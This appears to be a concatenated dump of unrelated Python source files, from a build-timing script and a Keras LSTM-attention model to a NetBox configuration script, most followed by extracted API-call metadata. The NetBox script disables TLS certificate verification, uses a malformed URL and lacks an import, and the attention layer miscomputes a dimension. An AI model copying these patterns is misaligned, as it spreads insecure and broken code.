config[1]="%dm%ss" % (mins, secs)
print("Config %s took %dm%ss" % (config[0], mins, secs))
print("\n\n")
for config in configs:
print(config)
| [
"os.path.exists",
"time.perf_counter",
"os.getcwd",
"shutil.rmtree",
"os.chdir",
"platform.system",
"subprocess.call",
"sys.exit",
"os.path.abspath"
] | [((875, 904), 'shutil.rmtree', 'shutil.rmtree', (['"""bin.v2"""', '(True)'], {}), "('bin.v2', True)\n", (888, 904), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((699, 710), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (707, 710), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((862, 873), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (871, 873), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((931, 948), 'platform.system', 'platform.system', ([], {}), '()\n', (946, 948), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((718, 738), 'os.path.exists', 'os.path.exists', (['"""b2"""'], {}), "('b2')\n", (732, 738), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((747, 771), 'os.path.exists', 'os.path.exists', (['"""b2.exe"""'], {}), "('b2.exe')\n", (761, 771), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((1813, 1824), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1822, 1824), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2444, 2483), 'shutil.rmtree', 'shutil.rmtree', (['"""bin.v2/libs/afio"""', '(True)'], {}), "('bin.v2/libs/afio', True)\n", (2457, 2483), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2651, 2690), 'shutil.rmtree', 'shutil.rmtree', (['"""bin.v2/libs/afio"""', '(True)'], {}), "('bin.v2/libs/afio', True)\n", (2664, 2690), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2741, 2760), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (2758, 2760), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2877, 2896), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (2894, 2896), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2047, 2068), 'os.chdir', 'os.chdir', (['"""libs/afio"""'], {}), "('libs/afio')\n", (2055, 2068), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2075, 2104), 'shutil.rmtree', 'shutil.rmtree', (['test_all', '(True)'], {}), '(test_all, True)\n', (2088, 2104), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2114, 2158), 'subprocess.call', 'subprocess.call', (['tocall'], {'env': 'env', 'shell': '(True)'}), '(tocall, env=env, shell=True)\n', (2129, 2158), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2210, 2239), 'shutil.rmtree', 'shutil.rmtree', (['test_all', '(True)'], {}), '(test_all, True)\n', (2223, 2239), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2294, 2313), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (2311, 2313), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2320, 2364), 'subprocess.call', 'subprocess.call', (['tocall'], {'env': 'env', 'shell': '(True)'}), '(tocall, env=env, shell=True)\n', (2335, 2364), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2375, 2394), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (2392, 2394), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2414, 2431), 'os.chdir', 'os.chdir', (['basedir'], {}), '(basedir)\n', (2422, 2431), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2508, 2529), 'os.path.abspath', 'os.path.abspath', (['"""b2"""'], {}), "('b2')\n", (2523, 2529), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2782, 2803), 'os.path.abspath', 'os.path.abspath', (['"""b2"""'], {}), "('b2')\n", (2797, 2803), False, 'import os, sys, subprocess, time, shutil, platform\n')] |
# -*- coding:utf-8 -*-
from src.Client.Conf.config import *
from src.Client.recitationSystem.editRecitation.tools import editRecitationList, removeRecitation
from src.Client.SystemTools.SaveFiles import saveFiles
class EditRecitation():
"""
编辑任务子系统。调用类,任务由被调用者完成。
"""
def __init__(self, filename='../data/recitation.dat'):
# 初始化工具
self.editRecitationListTools = editRecitationList.EditRecitationList()
self.removeRecitationTools = removeRecitation.RemoveRecitation()
self.saveRecitationTools = saveFiles.SaveFiles(filename=filename)
pass
def edit(self, list, recitationId, question=None, answer=None, isEdit=False, isDelete=False, weight=10):
"""
:param list: 需要被编辑的列表
:param recitationId: 任务id
:param question: 问题
:param answer: 答案
:param weight: 权重
:param isEdit: 执行编辑任务标记
:param isDelete: 执行删除任务标记
:return: 编辑后的list
"""
try:
# 对不同的编辑命令做出不同的响应
if isEdit:
# 调用编辑子系统
list = self.editRecitationListTools.edit(list=list, recitationId=recitationId, question=question,
answer=answer, weight=weight)
self.saveRecitationTools.saveFiles(list)
if isDelete:
# 调用删除子系统
list = self.removeRecitationTools.remove(list=list, recitationId=recitationId)
self.saveRecitationTools.saveFiles(list)
except:
# 打印debug日志
if DEBUG and MISSION_DEBUG:
print('{SYS}{W}{RECITATION_DEBUG} can not edit recitation')
# 测试任务编辑系统
if __name__ == '__main__':
from src.Client.SystemTools.LoadFiles import loadFiles
l = loadFiles.LoadFiles("F:\python17\pythonPro\MemortAssit\data\mission.dat")
list = l.loadFiles(missionType='mission')
print(list)
print()
e = EditRecitation('F:\python17\pythonPro\MemortAssit\data\mission.dat')
# 测试更改完成状态
# e.edit(list, '000025', isFinish=True)
# 测试更改
# e.edit(list, '000025', isEdit=True, bookName='bookTest')
# 测试删除
e.edit(list, '000025', isDelete=True)
print(list)
| [
"src.Client.SystemTools.LoadFiles.loadFiles.LoadFiles",
"src.Client.recitationSystem.editRecitation.tools.editRecitationList.EditRecitationList",
"src.Client.SystemTools.SaveFiles.saveFiles.SaveFiles",
"src.Client.recitationSystem.editRecitation.tools.removeRecitation.RemoveRecitation"
] | [((1787, 1865), 'src.Client.SystemTools.LoadFiles.loadFiles.LoadFiles', 'loadFiles.LoadFiles', (['"""F:\\\\python17\\\\pythonPro\\\\MemortAssit\\\\data\\\\mission.dat"""'], {}), "('F:\\\\python17\\\\pythonPro\\\\MemortAssit\\\\data\\\\mission.dat')\n", (1806, 1865), False, 'from src.Client.SystemTools.LoadFiles import loadFiles\n'), ((398, 437), 'src.Client.recitationSystem.editRecitation.tools.editRecitationList.EditRecitationList', 'editRecitationList.EditRecitationList', ([], {}), '()\n', (435, 437), False, 'from src.Client.recitationSystem.editRecitation.tools import editRecitationList, removeRecitation\n'), ((475, 510), 'src.Client.recitationSystem.editRecitation.tools.removeRecitation.RemoveRecitation', 'removeRecitation.RemoveRecitation', ([], {}), '()\n', (508, 510), False, 'from src.Client.recitationSystem.editRecitation.tools import editRecitationList, removeRecitation\n'), ((546, 584), 'src.Client.SystemTools.SaveFiles.saveFiles.SaveFiles', 'saveFiles.SaveFiles', ([], {'filename': 'filename'}), '(filename=filename)\n', (565, 584), False, 'from src.Client.SystemTools.SaveFiles import saveFiles\n')] |
# -*- coding: utf-8 -*-
from __future__ import print_function
import keras
from keras.datasets import mnist
from keras.models import Model
from keras.layers import Input, Dense, TimeDistributed
from keras import initializers,regularizers,activations,constraints
from keras.engine.topology import Layer,InputSpec
from keras.layers import LSTM
import matplotlib.pyplot as plt
class SelfAttention(Layer):
#注意力模型(Attention layer:Self Attention)
def __init__(self,
activation=None,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(SelfAttention, self).__init__(**kwargs)
self.activation = activations.get(activation)
self.kernel_initializer = initializers.get(kernel_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.input_spec = InputSpec(ndim=2)
self.supports_masking = True
def build(self, input_shape):
time_steps = input_shape[1]
dimensions = input_shape[1]
self.attention = keras.models.Sequential(name='attention')
self.attention.add(keras.layers.Dense(dimensions,
input_shape=(
time_steps, dimensions,),
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint))
self.attention.add(keras.layers.Activation(self.activation))
self.attention.add(keras.layers.Dense(1,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint))
self.attention.add(keras.layers.Flatten())
self.attention.add(keras.layers.Activation('softmax'))
self.attention.add(keras.layers.RepeatVector(dimensions))
self.attention.add(keras.layers.Permute([2, 1]))
self.trainable_weights = self.attention.trainable_weights
self.non_trainable_weights = self.attention.non_trainable_weights
self.built = True
def call(self, inputs):
attention = self.attention(inputs)
return keras.layers.Multiply()([inputs, attention])
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = {
'activation': activations.serialize(self.activation),
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
}
return dict(config)
def Lstm_Attention(x_train,x_test,batch_size,num_classes,epochs,y_train,y_test):
#模型建置
x = Input(shape=(row, col, pixel))
# 輸入層
encoded_rows = TimeDistributed(LSTM(row_hidden))(x)
# TimeDistributed層
encoded_columns = LSTM(col_hidden)(encoded_rows)
#LSTM隱藏層
attention=SelfAttention()(encoded_columns)
#注意力層
prediction = Dense(num_classes, activation='softmax')(attention)
#輸出層,透過softmax進行分類
model = Model(x, prediction)
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
history=model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
#透過matplot繪圖顯示訓練過程
plt.subplot(211)
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='best')
plt.subplot(212)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='best')
plt.show()
scores = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
batch_size = 256 # 批次大小
num_classes = 10 # 類別大小
epochs = 50 # 訓練迭代次數
row_hidden = 128
col_hidden = 128
#調整目標樣本型態,訓練集資料
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(x_train.shape[0], 28, 28, 1)
x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
row, col, pixel = x_train.shape[1:]
if __name__ == "__main__":
Lstm_Attention(x_train,x_test,batch_size,num_classes,epochs,y_train,y_test) | [
"keras.engine.topology.InputSpec",
"matplotlib.pyplot.ylabel",
"keras.activations.get",
"keras.utils.to_categorical",
"keras.layers.Activation",
"keras.layers.Dense",
"keras.datasets.mnist.load_data",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"keras.constraints.serialize",
"keras.lay... | [((4891, 4908), 'keras.datasets.mnist.load_data', 'mnist.load_data', ([], {}), '()\n', (4906, 4908), False, 'from keras.datasets import mnist\n'), ((5244, 5292), 'keras.utils.to_categorical', 'keras.utils.to_categorical', (['y_train', 'num_classes'], {}), '(y_train, num_classes)\n', (5270, 5292), False, 'import keras\n'), ((5302, 5349), 'keras.utils.to_categorical', 'keras.utils.to_categorical', (['y_test', 'num_classes'], {}), '(y_test, num_classes)\n', (5328, 5349), False, 'import keras\n'), ((3409, 3439), 'keras.layers.Input', 'Input', ([], {'shape': '(row, col, pixel)'}), '(shape=(row, col, pixel))\n', (3414, 3439), False, 'from keras.layers import Input, Dense, TimeDistributed\n'), ((3756, 3776), 'keras.models.Model', 'Model', (['x', 'prediction'], {}), '(x, prediction)\n', (3761, 3776), False, 'from keras.models import Model\n'), ((4123, 4139), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (4134, 4139), True, 'import matplotlib.pyplot as plt\n'), ((4144, 4176), 'matplotlib.pyplot.plot', 'plt.plot', (["history.history['acc']"], {}), "(history.history['acc'])\n", (4152, 4176), True, 'import matplotlib.pyplot as plt\n'), ((4181, 4217), 'matplotlib.pyplot.plot', 'plt.plot', (["history.history['val_acc']"], {}), "(history.history['val_acc'])\n", (4189, 4217), True, 'import matplotlib.pyplot as plt\n'), ((4222, 4249), 'matplotlib.pyplot.title', 'plt.title', (['"""model accuracy"""'], {}), "('model accuracy')\n", (4231, 4249), True, 'import matplotlib.pyplot as plt\n'), ((4254, 4276), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""accuracy"""'], {}), "('accuracy')\n", (4264, 4276), True, 'import matplotlib.pyplot as plt\n'), ((4281, 4300), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""epoch"""'], {}), "('epoch')\n", (4291, 4300), True, 'import matplotlib.pyplot as plt\n'), ((4305, 4346), 'matplotlib.pyplot.legend', 'plt.legend', (["['train', 'test']"], {'loc': '"""best"""'}), "(['train', 'test'], loc='best')\n", (4315, 4346), True, 'import matplotlib.pyplot as plt\n'), ((4364, 4380), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (4375, 4380), True, 'import matplotlib.pyplot as plt\n'), ((4385, 4418), 'matplotlib.pyplot.plot', 'plt.plot', (["history.history['loss']"], {}), "(history.history['loss'])\n", (4393, 4418), True, 'import matplotlib.pyplot as plt\n'), ((4423, 4460), 'matplotlib.pyplot.plot', 'plt.plot', (["history.history['val_loss']"], {}), "(history.history['val_loss'])\n", (4431, 4460), True, 'import matplotlib.pyplot as plt\n'), ((4465, 4488), 'matplotlib.pyplot.title', 'plt.title', (['"""model loss"""'], {}), "('model loss')\n", (4474, 4488), True, 'import matplotlib.pyplot as plt\n'), ((4493, 4511), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""loss"""'], {}), "('loss')\n", (4503, 4511), True, 'import matplotlib.pyplot as plt\n'), ((4516, 4535), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""epoch"""'], {}), "('epoch')\n", (4526, 4535), True, 'import matplotlib.pyplot as plt\n'), ((4540, 4581), 'matplotlib.pyplot.legend', 'plt.legend', (["['train', 'test']"], {'loc': '"""best"""'}), "(['train', 'test'], loc='best')\n", (4550, 4581), True, 'import matplotlib.pyplot as plt\n'), ((4586, 4596), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4594, 4596), True, 'import matplotlib.pyplot as plt\n'), ((874, 901), 'keras.activations.get', 'activations.get', (['activation'], {}), '(activation)\n', (889, 901), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((936, 972), 'keras.initializers.get', 'initializers.get', (['kernel_initializer'], {}), '(kernel_initializer)\n', (952, 972), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((1007, 1043), 'keras.regularizers.get', 'regularizers.get', (['kernel_regularizer'], {}), '(kernel_regularizer)\n', (1023, 1043), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((1077, 1111), 'keras.constraints.get', 'constraints.get', (['kernel_constraint'], {}), '(kernel_constraint)\n', (1092, 1111), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((1138, 1155), 'keras.engine.topology.InputSpec', 'InputSpec', ([], {'ndim': '(2)'}), '(ndim=2)\n', (1147, 1155), False, 'from keras.engine.topology import Layer, InputSpec\n'), ((1326, 1367), 'keras.models.Sequential', 'keras.models.Sequential', ([], {'name': '"""attention"""'}), "(name='attention')\n", (1349, 1367), False, 'import keras\n'), ((3551, 3567), 'keras.layers.LSTM', 'LSTM', (['col_hidden'], {}), '(col_hidden)\n', (3555, 3567), False, 'from keras.layers import LSTM\n'), ((3669, 3709), 'keras.layers.Dense', 'Dense', (['num_classes'], {'activation': '"""softmax"""'}), "(num_classes, activation='softmax')\n", (3674, 3709), False, 'from keras.layers import Input, Dense, TimeDistributed\n'), ((1404, 1611), 'keras.layers.Dense', 'keras.layers.Dense', (['dimensions'], {'input_shape': '(time_steps, dimensions)', 'kernel_initializer': 'self.kernel_initializer', 'kernel_regularizer': 'self.kernel_regularizer', 'kernel_constraint': 'self.kernel_constraint'}), '(dimensions, input_shape=(time_steps, dimensions),\n kernel_initializer=self.kernel_initializer, kernel_regularizer=self.\n kernel_regularizer, kernel_constraint=self.kernel_constraint)\n', (1422, 1611), False, 'import keras\n'), ((1867, 1907), 'keras.layers.Activation', 'keras.layers.Activation', (['self.activation'], {}), '(self.activation)\n', (1890, 1907), False, 'import keras\n'), ((1936, 2096), 'keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'kernel_initializer': 'self.kernel_initializer', 'kernel_regularizer': 'self.kernel_regularizer', 'kernel_constraint': 'self.kernel_constraint'}), '(1, kernel_initializer=self.kernel_initializer,\n kernel_regularizer=self.kernel_regularizer, kernel_constraint=self.\n kernel_constraint)\n', (1954, 2096), False, 'import keras\n'), ((2263, 2285), 'keras.layers.Flatten', 'keras.layers.Flatten', ([], {}), '()\n', (2283, 2285), False, 'import keras\n'), ((2314, 2348), 'keras.layers.Activation', 'keras.layers.Activation', (['"""softmax"""'], {}), "('softmax')\n", (2337, 2348), False, 'import keras\n'), ((2386, 2423), 'keras.layers.RepeatVector', 'keras.layers.RepeatVector', (['dimensions'], {}), '(dimensions)\n', (2411, 2423), False, 'import keras\n'), ((2461, 2489), 'keras.layers.Permute', 'keras.layers.Permute', (['[2, 1]'], {}), '([2, 1])\n', (2481, 2489), False, 'import keras\n'), ((2782, 2805), 'keras.layers.Multiply', 'keras.layers.Multiply', ([], {}), '()\n', (2803, 2805), False, 'import keras\n'), ((2985, 3023), 'keras.activations.serialize', 'activations.serialize', (['self.activation'], {}), '(self.activation)\n', (3006, 3023), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((3059, 3106), 'keras.initializers.serialize', 'initializers.serialize', (['self.kernel_initializer'], {}), '(self.kernel_initializer)\n', (3081, 3106), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((3142, 3189), 'keras.regularizers.serialize', 'regularizers.serialize', (['self.kernel_regularizer'], {}), '(self.kernel_regularizer)\n', (3164, 3189), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((3224, 3269), 'keras.constraints.serialize', 'constraints.serialize', (['self.kernel_constraint'], {}), '(self.kernel_constraint)\n', (3245, 3269), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((3485, 3501), 'keras.layers.LSTM', 'LSTM', (['row_hidden'], {}), '(row_hidden)\n', (3489, 3501), False, 'from keras.layers import LSTM\n')] |
import numpy as np
import math
from pyspark.sql import Row
"""
Implementation of Lorentz vector
"""
class LorentzVector(object):
def __init__(self, *args):
if len(args)>0:
self.x = args[0]
self.y = args[1]
self.z = args[2]
self.t = args[3]
def SetPtEtaPhiM(self, pt, eta, phi, mass):
pt = abs(pt)
self.SetXYZM(pt*math.cos(phi), pt*math.sin(phi), pt*math.sinh(eta), mass)
def SetXYZM(self, x, y, z, m):
self.x = x;
self.y = y
self.z = z
if (m>=0):
self.t = math.sqrt(x*x + y*y + z*z + m*m)
else:
self.t = math.sqrt(max(x*x + y*y + z*z - m*m, 0))
def E(self):
return self.t
def Px(self):
return self.x
def Py(self):
return self.y
def Pz(self):
return self.z
def Pt(self):
return math.sqrt(self.x*self.x + self.y*self.y)
def Eta(self):
cosTheta = self.CosTheta()
if cosTheta*cosTheta<1:
return -0.5*math.log((1.0 - cosTheta)/(1.0 + cosTheta))
if self.z == 0: return 0
def mag(self):
return math.sqrt(self.x*self.x + self.y*self.y + self.z*self.z)
def CosTheta(self):
return 1.0 if self.mag()==0.0 else self.z/self.mag()
def Phi(self):
return math.atan2(self.y, self.x)
def DeltaR(self, other):
deta = self.Eta() - other.Eta()
dphi = self.Phi() - other.Phi()
pi = math.pi
while dphi > pi: dphi -= 2*pi
while dphi < -pi: dphi += 2*pi
return math.sqrt(deta*deta + dphi*dphi)
"""
Functions used to return the Pt map of selected tracks, neutrals and photons
"""
def ChPtMapp(DR, event):
pTmap = []
for h in event.EFlowTrack:
if h.PT<= 0.5: continue
pTmap.append([h.Eta, h.Phi, h.PT])
return np.asarray(pTmap)
def NeuPtMapp(DR, event):
pTmap = []
for h in event.EFlowNeutralHadron:
if h.ET<= 1.0: continue
pTmap.append([h.Eta, h.Phi, h.ET])
return np.asarray(pTmap)
def PhotonPtMapp(DR, event):
pTmap = []
for h in event.EFlowPhoton:
if h.ET<= 1.0: continue
pTmap.append([h.Eta, h.Phi, h.ET])
return np.asarray(pTmap)
"""
Functions used to return the Pt map of selected tracks, neutrals and photons
Versions used for the optimized filtering with Spark SQL and HOF
"""
# get the selected tracks
def ChPtMapp2(Tracks):
#pTmap = []
pTmap = np.zeros((len(Tracks), 3))
for i, h in enumerate(Tracks):
pTmap[i] = [h["Eta"], h["Phi"], h["PT"]]
return pTmap
# get the selected neutrals
def NeuPtMapp2(NeutralHadrons):
pTmap = np.zeros((len(NeutralHadrons), 3))
for i, h in enumerate(NeutralHadrons):
pTmap[i] = [h["Eta"], h["Phi"], h["ET"]]
return pTmap
# get the selected photons
def PhotonPtMapp2(Photons):
pTmap = np.zeros((len(Photons), 3))
for i, h in enumerate(Photons):
pTmap[i] = [h["Eta"], h["Phi"], h["ET"]]
return pTmap
"""
Get the particle ISO
"""
def PFIso(p, DR, PtMap, subtractPt):
if p.Pt() <= 0.: return 0.
DeltaEta = PtMap[:,0] - p.Eta()
DeltaPhi = PtMap[:,1] - p.Phi()
twopi = 2.* math.pi
DeltaPhi = DeltaPhi - twopi*(DeltaPhi > twopi) + twopi*(DeltaPhi < -1.*twopi)
isInCone = DeltaPhi*DeltaPhi + DeltaEta*DeltaEta < DR*DR
Iso = PtMap[isInCone, 2].sum()/p.Pt()
if subtractPt: Iso = Iso -1
return float(Iso)
| [
"math.sqrt",
"numpy.asarray",
"math.log",
"math.cos",
"math.atan2",
"math.sin",
"math.sinh"
] | [((1956, 1973), 'numpy.asarray', 'np.asarray', (['pTmap'], {}), '(pTmap)\n', (1966, 1973), True, 'import numpy as np\n'), ((2141, 2158), 'numpy.asarray', 'np.asarray', (['pTmap'], {}), '(pTmap)\n', (2151, 2158), True, 'import numpy as np\n'), ((2322, 2339), 'numpy.asarray', 'np.asarray', (['pTmap'], {}), '(pTmap)\n', (2332, 2339), True, 'import numpy as np\n'), ((935, 979), 'math.sqrt', 'math.sqrt', (['(self.x * self.x + self.y * self.y)'], {}), '(self.x * self.x + self.y * self.y)\n', (944, 979), False, 'import math\n'), ((1207, 1269), 'math.sqrt', 'math.sqrt', (['(self.x * self.x + self.y * self.y + self.z * self.z)'], {}), '(self.x * self.x + self.y * self.y + self.z * self.z)\n', (1216, 1269), False, 'import math\n'), ((1393, 1419), 'math.atan2', 'math.atan2', (['self.y', 'self.x'], {}), '(self.y, self.x)\n', (1403, 1419), False, 'import math\n'), ((1666, 1702), 'math.sqrt', 'math.sqrt', (['(deta * deta + dphi * dphi)'], {}), '(deta * deta + dphi * dphi)\n', (1675, 1702), False, 'import math\n'), ((600, 640), 'math.sqrt', 'math.sqrt', (['(x * x + y * y + z * z + m * m)'], {}), '(x * x + y * y + z * z + m * m)\n', (609, 640), False, 'import math\n'), ((400, 413), 'math.cos', 'math.cos', (['phi'], {}), '(phi)\n', (408, 413), False, 'import math\n'), ((418, 431), 'math.sin', 'math.sin', (['phi'], {}), '(phi)\n', (426, 431), False, 'import math\n'), ((436, 450), 'math.sinh', 'math.sinh', (['eta'], {}), '(eta)\n', (445, 450), False, 'import math\n'), ((1091, 1136), 'math.log', 'math.log', (['((1.0 - cosTheta) / (1.0 + cosTheta))'], {}), '((1.0 - cosTheta) / (1.0 + cosTheta))\n', (1099, 1136), False, 'import math\n')] |
import pygame
from Utils.Math_utils import distance
class SpriteUtils:
@staticmethod
def get_closet_enemy(x, y, max_radius, sprites: [pygame.sprite.Sprite], metric_func):
radius_sprites = list(
filter(lambda pos: distance((x, y), (pos.rect.centerx, pos.rect.centery)) <= max_radius, sprites))
if radius_sprites:
closet = metric_func(radius_sprites,
key=lambda pos: distance((x, y), (pos.rect.centerx, pos.rect.centery)))
return closet
return None
| [
"Utils.Math_utils.distance"
] | [((245, 299), 'Utils.Math_utils.distance', 'distance', (['(x, y)', '(pos.rect.centerx, pos.rect.centery)'], {}), '((x, y), (pos.rect.centerx, pos.rect.centery))\n', (253, 299), False, 'from Utils.Math_utils import distance\n'), ((451, 505), 'Utils.Math_utils.distance', 'distance', (['(x, y)', '(pos.rect.centerx, pos.rect.centery)'], {}), '((x, y), (pos.rect.centerx, pos.rect.centery))\n', (459, 505), False, 'from Utils.Math_utils import distance\n')] |
from math import sqrt
R,B=list(map(int,input().split()))
S = R+B
for i in range(1, int(sqrt(S))+1):
if S % i ==0 :
a = i
b = S // i
if a<b:
a,b=b,a
if a>2 and b>2 and (a-2)*(b-2) == B:
print(a,b) | [
"math.sqrt"
] | [((87, 94), 'math.sqrt', 'sqrt', (['S'], {}), '(S)\n', (91, 94), False, 'from math import sqrt\n')] |
""" Like functools.singledispatch, but dynamic, value-based dispatch. """
__all__ = ('dynamic_dispatch',)
import functools
import inspect
from typing import Union, Callable, Type, Hashable
from dynamic_dispatch._class import class_dispatch
from dynamic_dispatch._func import func_dispatch
from ._typeguard import typechecked
@typechecked(always=True)
def dynamic_dispatch(func: Union[Callable, Type, None] = None, *, default: bool = False):
"""
Value-based dynamic-dispatch class decorator.
Allows a class or function to have different implementations depending on the
value of func's first parameter. The decorated class or function can act as
the default implementation, if desired.
Additional implementations may be registered for dispatch using the register()
attribute of the dispatch class or function. If the implementation has a param
of the same name as the first of func, it will be passed along.
:Example:
>>> @dynamic_dispatch(default=True)
>>> def foo(bar: int):
>>> print(bar)
>>>
>>> @foo.dispatch(on=5)
>>> def _(bar: int, baz: int):
>>> print(bar * baz)
>>>
>>> @foo.dispatch(on=10)
>>> def _():
>>> print(-10)
>>>
>>> foo(1)
1
>>> foo(5, 10)
50
>>> foo(10)
-10
:Example:
>>> @dynamic_dispatch(default=True)
>>> class Foo:
>>> def __init__(self, foo: int):
>>> super().__init__()
>>> print(bar)
>>>
>>> @Foo.dispatch(foo=5)
>>> class Bar(Foo):
>>> def __init__(self, foo, bar):
>>> super().__init__(foo)
>>> print(foo * bar)
>>>
>>> Foo(1)
1
<__main__.Foo object at ...>
>>> Foo(5, 10)
50
<__main__.Bar object at ...>
:param func: class or function to add dynamic dispatch to.
:param default: whether or not to use func as the default implementation.
:returns: func with dynamic dispatch
"""
# Default was specified, wait until func is here too.
if func is None:
return functools.partial(dynamic_dispatch, default=default)
# Delegate depending on wrap type.
if inspect.isclass(func):
return class_dispatch(func, default)
func = func_dispatch(func, default=default)
# Alter register to hide implicit parameter.
dispatch = func.dispatch
def replacement(impl: Callable = None, *, on: Hashable):
if impl is None:
return functools.partial(replacement, on=on)
return dispatch(impl, arguments=inspect.signature(impl).parameters, on=on)
# Type checker complains if we assign directly.
setattr(func, 'dispatch', replacement)
return func
| [
"dynamic_dispatch._class.class_dispatch",
"inspect.signature",
"dynamic_dispatch._func.func_dispatch",
"functools.partial",
"inspect.isclass"
] | [((2313, 2334), 'inspect.isclass', 'inspect.isclass', (['func'], {}), '(func)\n', (2328, 2334), False, 'import inspect\n'), ((2393, 2429), 'dynamic_dispatch._func.func_dispatch', 'func_dispatch', (['func'], {'default': 'default'}), '(func, default=default)\n', (2406, 2429), False, 'from dynamic_dispatch._func import func_dispatch\n'), ((2213, 2265), 'functools.partial', 'functools.partial', (['dynamic_dispatch'], {'default': 'default'}), '(dynamic_dispatch, default=default)\n', (2230, 2265), False, 'import functools\n'), ((2351, 2380), 'dynamic_dispatch._class.class_dispatch', 'class_dispatch', (['func', 'default'], {}), '(func, default)\n', (2365, 2380), False, 'from dynamic_dispatch._class import class_dispatch\n'), ((2615, 2652), 'functools.partial', 'functools.partial', (['replacement'], {'on': 'on'}), '(replacement, on=on)\n', (2632, 2652), False, 'import functools\n'), ((2694, 2717), 'inspect.signature', 'inspect.signature', (['impl'], {}), '(impl)\n', (2711, 2717), False, 'import inspect\n')] |
from pprint import pprint
from collections import defaultdict
import yaml
import pynetbox
def get_netbox():
"""
Return Netbox API handler
Returns:
pynetbox.API -- Netbox API handler
"""
nburl = "http://1192.168.127.12:8000/"
NETBOX_TOKEN = "<KEY>"
session = requests.Session()
session.verify = False # https://pynetbox.readthedocs.io/en/latest/advanced.html#ssl-verification
nb = pynetbox.api(url=nburl, token=NETBOX_TOKEN, threading=True)
nb.http_session = session
return nb
nb = get_netbox()
def ddict():
return defaultdict(ddict)
def ddict2dict(d):
for k, v in d.items():
if isinstance(v, dict):
d[k] = ddict2dict(v)
return dict(d)
structured_config = ddict()
structured_config["router_bgp"]= {} #TODO
structured_config["static_routes"]= {} #TODO
structured_config["service_routing_protocols_model"]= "multi-agent"
structured_config["ip_routing"]= True
structured_config["vlan_internal_order"]["allocation"]= "ascending"
structured_config["vlan_internal_order"]["range"]["beginning"]= 1006
structured_config["vlan_internal_order"]["range"]["ending"]= 1199
structured_config["name_server"] #TODO
structured_config["spanning_tree"]["mode"] = "mstp"
structured_config["spanning_tree"]["mst_instances"]["0"]["priority"] = 4096
userscf= nb.extras.config_contexts.get(name='local-users').data
users= userscf["system"]["aaa"]["authentication"]["users"]
for user in users:
structured_config["local_users"][user]["privilege"]= users[user]['privilege']
